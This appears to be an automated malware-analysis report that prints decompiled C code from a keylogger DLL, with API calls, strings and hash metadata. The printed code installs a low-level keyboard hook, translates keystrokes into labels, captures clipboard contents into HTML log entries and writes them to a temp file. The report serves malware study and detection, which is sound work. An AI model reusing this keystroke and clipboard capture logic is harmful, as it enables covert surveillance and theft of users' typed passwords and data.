                  • Opcode Fuzzy Hash: 19a7d89fdd0d4a8943666261cc10e3fb7835feb1d7da3395f8e32f4d42fefbdb
                  • Instruction Fuzzy Hash: E5211D38B041C99BF711DA99858295FB3E9DB8D7C2FB08091B8415731EDB37BF019622
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E10006E78(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed int _a12, void* _a16, struct HKL__* _a20) {
                  				char _v5;
                  				void _v261;
                  				char _v520;
                  				int _v524;
                  				void _v528;
                  				short _v784;
                  				char _v1040;
                  				char _v1044;
                  				char _v1048;
                  				void* _t43;
                  				int _t68;
                  				int _t72;
                  				intOrPtr _t108;
                  				struct HKL__* _t129;
                  				struct HKL__* _t133;
                  				struct HKL__* _t137;
                  				int _t140;
                  				int _t142;
                  				void* _t147;
                  				int _t160;
                  
                  				_v1048 = 0;
                  				_v1044 = 0;
                  				memcpy( &_v261, _a16, 0x40 << 2);
                  				_t96 = _a4;
                  				_t129 = _a20;
                  				_push(_t147);
                  				_push(0x100078b7);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t147 + 0xfffffffffffffbf8;
                  				E10003770(_a4);
                  				_t43 = (_a8 & 0x0000ffff) + 0xfffffff8;
                  				if(_t43 <= 0xf3) {
                  					switch( *((intOrPtr*)( *(_t43 + 0x10006edc) * 4 +  &M10006FD0))) {
                  						case 0:
                  							goto L91;
                  						case 1:
                  							E100037AC(_t96, L"[Numpad +]");
                  							goto L91;
                  						case 2:
                  							__eax = __ebx;
                  							__edx = L"[Backspace]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 3:
                  							__eax = __ebx;
                  							__edx = L"[Numpad .]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 4:
                  							__eax = __ebx;
                  							__edx = L"[Numpad /]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 5:
                  							__eax = __ebx;
                  							__edx = L"[Esc]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 6:
                  							__eax = __ebx;
                  							__edx = L"[Execute]";
                  							__eax = E100037AC(__ebx, __edx);
                  							_push(__edx);
                  							__eax = __eax + 0xc38b0000;
                  							__eflags = __eax;
                  							goto L91;
                  						case 7:
                  							__eax = __ebx;
                  							__edx = L"[Numpad *]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 8:
                  							__eax = __ebx;
                  							__edx = 0x10007980;
                  							__eax = E100037AC(__ebx, 0x10007980);
                  							goto L91;
                  						case 9:
                  							__eax = __ebx;
                  							__edx = 0x10007988;
                  							__eax = E100037AC(__ebx, 0x10007988);
                  							goto L91;
                  						case 0xa:
                  							__eax = __ebx;
                  							__edx = 0x10007990;
                  							__eax = E100037AC(__ebx, 0x10007990);
                  							goto L91;
                  						case 0xb:
                  							__eax = __ebx;
                  							__edx = 0x10007998;
                  							__eax = E100037AC(__ebx, 0x10007998);
                  							goto L91;
                  						case 0xc:
                  							__eax = __ebx;
                  							__edx = 0x100079a0;
                  							__eax = E100037AC(__ebx, 0x100079a0);
                  							goto L91;
                  						case 0xd:
                  							__eax = __ebx;
                  							__edx = 0x100079a8;
                  							__eax = E100037AC(__ebx, 0x100079a8);
                  							goto L91;
                  						case 0xe:
                  							__eax = __ebx;
                  							__edx = 0x100079b0;
                  							__eax = E100037AC(__ebx, 0x100079b0);
                  							goto L91;
                  						case 0xf:
                  							__eax = __ebx;
                  							__edx = 0x100079b8;
                  							__eax = E100037AC(__ebx, 0x100079b8);
                  							goto L91;
                  						case 0x10:
                  							__eax = __ebx;
                  							__edx = 0x100079c0;
                  							__eax = E100037AC(__ebx, 0x100079c0);
                  							goto L91;
                  						case 0x11:
                  							__eax = __ebx;
                  							__edx = 0x100079c8;
                  							__eax = E100037AC(__ebx, 0x100079c8);
                  							goto L91;
                  						case 0x12:
                  							__eax = __ebx;
                  							__edx = L"[Back Tab]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x13:
                  							__eax = __ebx;
                  							__edx = L"[Copy]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x14:
                  							__eax = __ebx;
                  							__edx = L"[Finish]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x15:
                  							__eax = __ebx;
                  							__edx = L"[Reset]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x16:
                  							__eax = __ebx;
                  							__edx = L"[Play]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x17:
                  							__eax = __ebx;
                  							__edx = L"[Process]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x18:
                  							__eax = __ebx;
                  							__edx = 0x10007a58;
                  							__eax = E100037AC(__ebx, 0x10007a58);
                  							goto L91;
                  						case 0x19:
                  							__eax = __ebx;
                  							__edx = L"[Select]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x1a:
                  							__eax = __ebx;
                  							__edx = L"[Separator]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x1b:
                  							__eax = __ebx;
                  							__edx = 0x10007a98;
                  							__eax = E100037AC(__ebx, 0x10007a98);
                  							goto L91;
                  						case 0x1c:
                  							__eax = __ebx;
                  							__edx = L"[Numpad -]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x1d:
                  							__eax = __ebx;
                  							__edx = L"[Tab]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x1e:
                  							__eax = __ebx;
                  							__edx = L"[Zoom]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x1f:
                  							__eax = __ebx;
                  							__edx = L"[Accept]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x20:
                  							__eax = __ebx;
                  							__edx = L"[Context Menu]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x21:
                  							__eax = __ebx;
                  							__edx = L"[Caps Lock]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x22:
                  							__eax = __ebx;
                  							__edx = L"[Delete]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x23:
                  							__eax = __ebx;
                  							__edx = L"[Arrow Down]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x24:
                  							__eax = __ebx;
                  							__edx = L"[End]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x25:
                  							__eax = __ebx;
                  							__edx = L"[F1]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x26:
                  							__eax = __ebx;
                  							__edx = L"[F10]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x27:
                  							__eax = __ebx;
                  							__edx = L"[F11]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x28:
                  							__eax = __ebx;
                  							__edx = L"[F12]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x29:
                  							__eax = __ebx;
                  							__edx = L"[F13]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x2a:
                  							__eax = __ebx;
                  							__edx = L"[F14]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x2b:
                  							__eax = __ebx;
                  							__edx = L"[F15]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x2c:
                  							__eax = __ebx;
                  							__edx = L"[F16]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x2d:
                  							__eax = __ebx;
                  							__edx = L"[F17]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x2e:
                  							__eax = __ebx;
                  							__edx = L"[F18]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x2f:
                  							__eax = __ebx;
                  							__edx = L"[F19]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x30:
                  							__eax = __ebx;
                  							__edx = L"[F2]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x31:
                  							__eax = __ebx;
                  							__edx = L"[F20]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x32:
                  							__eax = __ebx;
                  							__edx = L"[F21]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x33:
                  							__eax = __ebx;
                  							__edx = L"[F22]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x34:
                  							__eax = __ebx;
                  							__edx = L"[F23]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x35:
                  							__eax = __ebx;
                  							__edx = L"[F24]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x36:
                  							__eax = __ebx;
                  							__edx = L"[F3]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x37:
                  							__eax = __ebx;
                  							__edx = L"[F4]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x38:
                  							__eax = __ebx;
                  							__edx = L"[F5]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x39:
                  							__eax = __ebx;
                  							__edx = L"[F6]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x3a:
                  							__eax = __ebx;
                  							__edx = L"[F7]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x3b:
                  							__eax = __ebx;
                  							__edx = L"[F8]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x3c:
                  							__eax = __ebx;
                  							__edx = L"[F9]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x3d:
                  							__eax = __ebx;
                  							__edx = L"[Help]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x3e:
                  							__eax = __ebx;
                  							__edx = L"[Home]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x3f:
                  							__eax = __ebx;
                  							__edx = L"[Insert]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x40:
                  							__eax = __ebx;
                  							__edx = L"[Mail]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x41:
                  							__eax = __ebx;
                  							__edx = L"[Media]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x42:
                  							__eax = __ebx;
                  							__edx = L"[Left Ctrl]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x43:
                  							__eax = __ebx;
                  							__edx = L"[Arrow Left]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x44:
                  							__eax = __ebx;
                  							__edx = L"[Left Alt]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x45:
                  							__eax = __ebx;
                  							__edx = L"[Next Track]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x46:
                  							__eax = __ebx;
                  							__edx = L"[Play / Pause]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x47:
                  							__eax = __ebx;
                  							__edx = L"[Previous Track]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x48:
                  							__eax = __ebx;
                  							__edx = L"[Stop]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x49:
                  							__eax = __ebx;
                  							__edx = L"[Mode Change]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x4a:
                  							__eax = __ebx;
                  							__edx = L"[Page Down]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x4b:
                  							__eax = __ebx;
                  							__edx = L"[Num Lock]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x4c:
                  							__eax = __ebx;
                  							__edx = L"[Pause]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x4d:
                  							__eax = __ebx;
                  							__edx = L"[Print]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x4e:
                  							__eax = __ebx;
                  							__edx = L"[Page Up]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x4f:
                  							__eax = __ebx;
                  							__edx = L"[Right Ctrl]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x50:
                  							__eax = __ebx;
                  							__edx = L"[Arrow Right]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x51:
                  							__eax = __ebx;
                  							__edx = L"[Right Alt]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x52:
                  							__eax = __ebx;
                  							__edx = L"[Scrol Lock]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x53:
                  							__eax = __ebx;
                  							__edx = L"[Sleep]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x54:
                  							__eax = __ebx;
                  							__edx = L"[Print Screen]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x55:
                  							__eax = __ebx;
                  							__edx = L"[Arrow Up]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x56:
                  							__eax = __ebx;
                  							__edx = L"[Volume Down]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x57:
                  							__eax = __ebx;
                  							__edx = L"[Volume Mute]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  						case 0x58:
                  							__eax = __ebx;
                  							__edx = L"[Volume Up]";
                  							__eax = E100037AC(__ebx, __edx);
                  							goto L91;
                  					}
                  				}
                  				L91:
                  				E10003A34( *_t96, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *_t96) > 0 && E10003B94(L"Numpad",  *_t96) <= 0) {
                  					E100037AC(_t96, L"KeyDelBackspace");
                  				}
                  				_v5 = E10006D04();
                  				_t140 = ToUnicodeEx(_a8 & 0x0000ffff, _a12 & 0x0000ffff,  &_v261,  &_v784, 0x100, 0, _t129);
                  				if(_t140 <= 0) {
                  					__eflags = _t140;
                  					if(_t140 < 0) {
                  						 *0x1000f6d8 = _a8 & 0x0000ffff;
                  						 *0x1000f6dc = _a12 & 0x0000ffff;
                  						memcpy(0x1000f6e0,  &_v261, 0x40 << 2);
                  						_t133 = _t129;
                  						_t142 = _t140;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t142;
                  						if(_t142 < 0) {
                  							do {
                  								_t68 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1),  &_v1040,  &_v784, 0x100, 0, _t133);
                  								__eflags = _t68;
                  							} while (_t68 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy( &_v528, 0x1000f6d8, 0x42 << 2);
                  					_t137 = _t129;
                  					E10003A34( *_t96, 0);
                  					if(0 == 0) {
                  						E100038E0(_t96, 0x80,  &_v784);
                  						_t159 = _v5;
                  						if(_v5 == 0) {
                  							E10006D80( *_t96, _t96, 0x80,  &_v1048, _t137, 0x1000f6d8, __eflags);
                  							E100037AC(_t96, _v1048);
                  						} else {
                  							E10006DFC( *_t96, _t96, 0x80,  &_v1044, _t137, 0x1000f6d8, _t159);
                  							E100037AC(_t96, _v1044);
                  						}
                  					}
                  					_t72 = _v528;
                  					_t160 = _t72;
                  					if(_t160 != 0) {
                  						ToUnicodeEx(_t72, _v524,  &_v520,  &_v784, 0x100, 0, _t137);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t96, L"KeyDelBackspace");
                  				if(_t160 == 0) {
                  					E10003770(_t96);
                  				}
                  				_pop(_t108);
                  				 *[fs:eax] = _t108;
                  				_push(E100078BE);
                  				return E10003788( &_v1048, 2);
                  			}

                  APIs
                  • Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$FreeString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 610577094-3409537306
                  • Opcode ID: ed6114367509c6d9fab90cc7175f2c84ae42d38466c56a82ea0a6d039912394e
                  • Instruction ID: 239179f37c3e83d944ae5989e00453cfc3f7d2dfafefd2690d13731161f6058c
                  • Opcode Fuzzy Hash: ed6114367509c6d9fab90cc7175f2c84ae42d38466c56a82ea0a6d039912394e
                  • Instruction Fuzzy Hash: 9451E9B9E002545BF721CB24CC41B9F73A9FB887C0F5081A5FA489724ADA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E100030CC(void* __ecx) {
                  				long _v4;
                  				int _t3;
                  
                  				if( *0x1000f038 == 0) {
                  					if( *0x1000e020 == 0) {
                  						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                  					}
                  					return _t3;
                  				} else {
                  					if( *0x1000f20c == 0xd7b2 &&  *0x1000f214 > 0) {
                  						 *0x1000f224();
                  					}
                  					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                  					return WriteFile(GetStdHandle(0xfffffff5), E10003154, 2,  &_v4, 0);
                  				}
                  			}
                  APIs
                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,1000319A,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000), ref: 10003105
                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,1000319A,?,?,?,00000002,1000323A,1000259B,100025E3,00000002), ref: 1000310B
                  • GetStdHandle.KERNEL32(000000F5,10003154,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,1000319A,?,?), ref: 10003120
                  • WriteFile.KERNEL32(00000000,000000F5,10003154,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,1000319A,?,?), ref: 10003126
                  • MessageBoxA.USER32 ref: 10003144
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: FileHandleWrite$Message
                  • String ID: Error$Runtime error at 00000000
                  • API String ID: 1570097196-2970929446
                  • Opcode ID: 34c1e474a0937ca068d19135c8955f1baf6dec87746d38fd93c81dd1fbdfdeba
                  • Instruction ID: d75082f90510a20ccce61780b3b63c21f75a1319e25b57c37db6013eec112d5f
                  • Opcode Fuzzy Hash: 34c1e474a0937ca068d19135c8955f1baf6dec87746d38fd93c81dd1fbdfdeba
                  • Instruction Fuzzy Hash: F8F0B4BA9443D078F621E3608C86FEB239CC745BD0F108208F364648DFCBE468C4A626
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E10008560(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
                  				intOrPtr _v8;
                  				void* _v12;
                  				char _v16;
                  				long _v24;
                  				long _v28;
                  				long _v32;
                  				char _v36;
                  				char _v40;
                  				intOrPtr _v44;
                  				char _v300;
                  				intOrPtr _v304;
                  				char _v308;
                  				char _v312;
                  				char _v316;
                  				char _v320;
                  				char _v324;
                  				char _v328;
                  				char _v332;
                  				char _v336;
                  				char _v340;
                  				char _v344;
                  				char _v348;
                  				char _v352;
                  				char _v356;
                  				char _v360;
                  				char _v364;
                  				char _v368;
                  				char _v372;
                  				char _v376;
                  				char _v380;
                  				char _v384;
                  				intOrPtr* _t101;
                  				intOrPtr _t102;
                  				intOrPtr _t103;
                  				void* _t111;
                  				void* _t113;
                  				void* _t123;
                  				intOrPtr _t135;
                  				long _t151;
                  				void* _t153;
                  				intOrPtr _t155;
                  				struct HHOOK__* _t160;
                  				struct HHOOK__* _t163;
                  				long _t193;
                  				void* _t196;
                  				void* _t198;
                  				long _t199;
                  				void* _t207;
                  				void* _t209;
                  				struct HHOOK__* _t211;
                  				intOrPtr _t230;
                  				void* _t246;
                  				void* _t249;
                  				intOrPtr _t258;
                  				void* _t267;
                  				void* _t268;
                  				void* _t269;
                  				void* _t270;
                  				intOrPtr _t273;
                  				intOrPtr _t284;
                  				intOrPtr _t291;
                  				intOrPtr _t303;
                  				intOrPtr _t304;
                  				intOrPtr _t305;
                  				void* _t330;
                  				intOrPtr _t332;
                  				intOrPtr _t333;
                  				void* _t337;
                  
                  				_t329 = __esi;
                  				_t328 = __edi;
                  				_t101 = __eax +  *__eax;
                  				 *_t101 =  *_t101 + _t101;
                  				 *_t101 =  *_t101 + _t101;
                  				_t332 = _t333;
                  				_t270 = 0x2f;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t270 = _t270 - 1;
                  				} while (_t270 != 0);
                  				_push(_t270);
                  				_push(__ebx);
                  				_push(__esi);
                  				_t267 = _a16;
                  				_t102 = _a8;
                  				_push(_t332);
                  				_push(0x10008ba5);
                  				_push( *[fs:edx]);
                  				 *[fs:edx] = _t333;
                  				_t337 = _t102 -  *0x1000f68c; // 0xc1b9
                  				if(_t337 != 0) {
                  					__eflags = _t102 -  *0x1000f690; // 0xc1ba
                  					if(__eflags != 0) {
                  						__eflags = _t102 -  *0x1000f694; // 0xc1bc
                  						if(__eflags != 0) {
                  							__eflags = _t102 -  *0x1000f698; // 0x0
                  							if(__eflags != 0) {
                  								__eflags = _t102 -  *0x1000f69c; // 0xc1bd
                  								if(__eflags != 0) {
                  									__eflags = _t102 - 0x308;
                  									if(_t102 != 0x308) {
                  										__eflags = _t102 -  *0x1000f6a0; // 0xc1be
                  										if(__eflags != 0) {
                  											_push(_t267);
                  											_push(_a12);
                  											_push(_t102);
                  											_t103 = _a4;
                  											_push(_t103);
                  											L10004FE0();
                  											_v8 = _t103;
                  										} else {
                  											__eflags =  *0x1000e0b8;
                  											if( *0x1000e0b8 != 0) {
                  												_t111 =  *0x1000e0b8; // 0x0
                  												SetFilePointer(_t111, 0, 0, 0);
                  												_t113 =  *0x1000e0b8; // 0x0
                  												SetEndOfFile(_t113);
                  												 *0x1000f6c4 = 0;
                  												 *0x1000f6c8 = 0;
                  												__eflags =  *0x1000f6c1 - 1;
                  												if(__eflags == 0) {
                  													E10006710( &_v380, _t270, 0,  *0x1000f6c4,  *0x1000f6c8);
                  													_t273 =  *0x1000f6b4; // 0x0
                  													E10003988( &_v384, _t273, L"SOFTWARE\\", __eflags);
                  													E1000577C(0x80000001, _t267, L"LastSize", _v384, __esi, __eflags, 2, _v380);
                  												}
                  											}
                  										}
                  									} else {
                  										__eflags =  *0x1000f6d4;
                  										if( *0x1000f6d4 != 0) {
                  											_t123 = E100069DC(0, _t267,  &_v12, __esi);
                  											__eflags = _t123 - 1;
                  											if(_t123 == 1) {
                  												_t291 =  *0x1000e0b4; // 0x0
                  												E10003A34(_v12, _t291);
                  												if(__eflags != 0) {
                  													E100037AC(0x1000e0b4, _v12);
                  													E10008270(L"\r\n\r\n", _t267,  &_v352, __edi, __esi);
                  													_push(_v352);
                  													_push(L"<FONT COLOR=\"red\">[Clipboard");
                  													_push(L" --- ");
                  													E10006B14(0x2f, _t267, 0x3a, 0x20, __edi, _t329,  &_v356);
                  													_push(_v356);
                  													_push(L"]</font>");
                  													E10008270(0x10008bcc, _t267,  &_v360, __edi, _t329);
                  													_push(_v360);
                  													_t135 =  *0x1000e0b4; // 0x0
                  													E10008270(_t135, _t267,  &_v364, _t328, _t329);
                  													_push(_v364);
                  													E10008270(0x10008bcc, _t267,  &_v368, _t328, _t329);
                  													_push(_v368);
                  													_push(L"<FONT COLOR=\"red\">[Clipboard End]</font>");
                  													E10008270(L"\r\n\r\n", _t267,  &_v372, _t328, _t329);
                  													_push(_v372);
                  													E100039EC();
                  													__eflags =  *0x1000e0b8 - 0xffffffff;
                  													if(__eflags != 0) {
                  														E100061F8(_v12,  &_v376, __eflags);
                  														E100037D0( &_v12, _v376);
                  														_t151 = E1000391C(_v12) + _t150;
                  														__eflags = _t151;
                  														_t153 =  *0x1000e0b8; // 0x0
                  														WriteFile(_t153, _v12, _t151,  &_v32, 0);
                  													}
                  													E100037AC(0x1000f6d0, L"qualquercoisarsrsr");
                  												}
                  											}
                  										}
                  									}
                  								} else {
                  									__eflags =  *0x1000f6d4;
                  									if( *0x1000f6d4 != 0) {
                  										_t155 =  *0x1000f69c; // 0xc1bd
                  										_v8 = _t155 + 1;
                  									}
                  								}
                  							} else {
                  								__eflags =  *0x1000f6d4;
                  								if( *0x1000f6d4 != 0) {
                  									_t160 =  *0x1000f6d4; // 0x0
                  									UnhookWindowsHookEx(_t160);
                  								}
                  								 *0x1000f6d4 = SetWindowsHookExW(0xd, E10008040, GetModuleHandleA(0), 0);
                  							}
                  						} else {
                  							__eflags =  *0x1000f6d4;
                  							if( *0x1000f6d4 != 0) {
                  								_t163 =  *0x1000f6d4; // 0x0
                  								UnhookWindowsHookEx(_t163);
                  							}
                  							 *0x1000f6d4 = 0;
                  						}
                  					} else {
                  						E10003770( &_v12);
                  						__eflags =  *0x1000f6d4;
                  						if( *0x1000f6d4 != 0) {
                  							_t211 =  *0x1000f6d4; // 0x0
                  							UnhookWindowsHookEx(_t211);
                  						}
                  						__eflags =  *0x1000e0b8 - 0xffffffff;
                  						if(__eflags != 0) {
                  							_t196 =  *0x1000e0b8; // 0x0
                  							SetFilePointer(_t196, 0, 0, 0);
                  							_t198 =  *0x1000e0b8; // 0x0
                  							_t199 = GetFileSize(_t198, 0);
                  							__eflags = 0;
                  							_v28 = _t199;
                  							_v24 = 0;
                  							E10003BE4( &_v12, E10003FD4(_v28, _v24, 2, 0));
                  							_t207 =  *0x1000e0b8; // 0x0
                  							ReadFile(_t207, _v12, _v28,  &_v32, 0);
                  							_t209 =  *0x1000e0b8; // 0x0
                  							SetFilePointer(_t209, 0, 0, 2);
                  						}
                  						_t303 =  *0x1000f684; // 0x0
                  						E10003988( &_v336, L"temp", _t303, __eflags);
                  						SetFileAttributesW(E1000390C(_v336), 0x80);
                  						_t304 =  *0x1000f684; // 0x0
                  						E10003988( &_v340, L"temp", _t304, __eflags);
                  						DeleteFileW(E1000390C(_v340));
                  						_t305 =  *0x1000f684; // 0x0
                  						E10003988( &_v344, L"temp", _t305, __eflags);
                  						_t268 = CreateFileW(E1000390C(_v344), 0x40000000, 0, 0, 2, 0, 0);
                  						__eflags = _t268 - 0xffffffff;
                  						if(__eflags != 0) {
                  							E100061F8(_v12,  &_v348, __eflags);
                  							E100037D0( &_v12, _v348);
                  							_t193 = E1000391C(_v12) + _t192;
                  							__eflags = _t193;
                  							WriteFile(_t268, _v12, _t193,  &_v32, 0);
                  						}
                  						CloseHandle(_t268);
                  						 *0x1000f6d4 = SetWindowsHookExW(0xd, E10008040, GetModuleHandleA(0), 0);
                  					}
                  					L43:
                  					_pop(_t284);
                  					 *[fs:eax] = _t284;
                  					_push(E10008BAC);
                  					E10003788( &_v384, 0x13);
                  					E10003788( &_v40, 2);
                  					return E10003788( &_v16, 2);
                  				}
                  				_t330 = _t267;
                  				E100050D0( &_v308, _t330);
                  				VirtualFree(_t330, 0, 0x8000);
                  				E10006E78(_t267, __edi, _t330,  &_v36, _v308, _v304,  &_v300, _v44);
                  				E100037D0( &_v40, _v36);
                  				E10006974( &_v16);
                  				_t269 = E10008438(_v16, _t267, __edi, _t330);
                  				_t230 =  *0x1000f6d0; // 0x0
                  				E10003A34(_t230, _v16);
                  				if(_t337 == 0) {
                  					L7:
                  					E10003770( &_v16);
                  					L8:
                  					E10003A34(_v40, 0);
                  					if(0 != 0) {
                  						_t340 = _t269 - 1;
                  						if(_t269 == 1) {
                  							E10008270(_v36, _t269,  &_v328, _t328, _t330);
                  							E10003988( &_v12, _v328, _v16, _t340);
                  							_t341 =  *0x1000e0b8 - 0xffffffff;
                  							if( *0x1000e0b8 != 0xffffffff) {
                  								E100061F8(_v12,  &_v332, _t341);
                  								E100037D0( &_v12, _v332);
                  								_t246 = E1000391C(_v12);
                  								_t249 =  *0x1000e0b8; // 0x0
